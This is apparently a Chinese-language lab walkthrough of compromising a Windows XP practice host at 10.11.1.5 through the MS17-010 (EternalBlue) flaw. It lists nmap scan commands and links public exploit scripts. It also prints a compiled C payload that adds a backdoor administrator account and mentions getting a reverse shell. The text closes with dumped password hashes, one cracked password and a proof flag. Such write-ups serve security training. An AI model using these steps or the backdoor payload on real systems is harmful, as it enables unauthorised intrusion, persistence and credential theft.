扫描端口

使用nmap -sV  -sC 10.11.1.5 -Pn对其进行扫描

Pasted_image_20240731203512.png

通过扫描发现,应该是SMB相关的漏洞,使用 nmap  --script smb-vuln-ms17-010,smb-vuln-ms08-067 --max-retries 5 -p 445  10.11.1.5 进行探测SMB相关漏洞
Pasted_image_20240731203641.png

可以发现存在MS17-010漏洞。

漏洞利用

先确认下目标的操作系统
nmap -sV -p 445  -Pn 10.11.1.5

Pasted_image_20240731203740.png

发现是xp系统,使用https://github.com/totekuh/eternalblue   中的脚本(需要是python2环境,python3会报错)。
这里我创建了一个c文件,功能为添加用户。内容如下: 
#include <stdlib.h>
int main ()
{
int i;
// add user
i = system ("net user juncye Jun12CyE /add && net localgroup administrators juncye /add");
return 0;
}

使用kali中的编译工具进行编译和去掉符号
/usr/bin/i686-w64-mingw32-gcc useradd.c -o us.exe
/usr/bin/i686-w64-mingw32-strip us.exe
使用send_and_execute.py 上传exe并执行

Pasted_image_20240731203947.png

发现上面使用的脚本并不会跑到send file地方,所以换了个exploit脚本 https://github.com/helviojunior/MS17-010  
这个脚本是有效的
Pasted_image_20240731204041.png

可以反弹shell
Pasted_image_20240731204125.png

获取到了proof.txt文件  ed20b785808f615be2c588ed925b18ce
Pasted_image_20240731204201.png

参考

参考链接:
 https://infosecwriteups.com/exploit-eternal-blue-ms17-010-for-windows-xp-with-custom-payload-fabbbbeb692f

附加

获取系统用户和密码信息:
用户名 HASH 密码
Administrator a8c8b7a37513b7eb9308952b814b522b
HelpAssistant 2733cdb0d8a1fec3f976f3b8ad1deeef
SUPPORT_388945a0 0f7a50dd4b95cec4c1dea566f820f4e7
alice b74242f37e47371aff835a6ebcac4ffe aliceishere

在C盘根目录下发现bank-account.zip文件,密码为alice

Pasted_image_20240731204307.png

打开后的内容如下:
Pasted_image_20240731204339.png